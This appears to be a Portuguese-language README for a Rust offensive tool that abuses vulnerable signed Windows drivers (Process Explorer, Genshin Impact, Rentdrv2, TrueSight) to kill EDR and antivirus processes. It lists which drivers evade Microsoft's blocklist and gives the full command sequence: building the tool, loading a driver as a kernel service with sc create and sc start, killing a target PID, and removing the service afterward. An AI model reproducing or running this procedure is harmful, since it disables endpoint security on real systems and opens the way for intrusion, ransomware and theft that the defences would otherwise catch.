
BYOVD collection
Este projeto é uma coleção BYOVD com foco em matar processos de EDR / AV.
Atualmente, os seguintes drivers são suportados:
| Driver | Nome do Argumento | Bloqueado |
|---|---|---|
| Process Explorer | process_explorer | Sim |
| Genshin Impact | genshin | Sim |
| Rentdrv2 | rentdrv2 | Não |
| TrueSight | truesight | Não |
Bloqueado significa que o driver está na lista de bloqueio da Microsoft e não pode ser executado em um Windows atualizado.
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
Como o executável não registra um serviço para explorar o driver, isso precisa ser feito manualmente:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
Depois, o serviço pode ser iniciado:
sc start Test123
Por fim, para matar o processo com o PID 1234 usando o driver do Process Explorer, o seguinte comando pode ser usado:
rusty_drivers.exe --pid 1234 --driver process_explorer
Não se esqueça de limpar o serviço depois:
sc stop Test123
sc delete Test123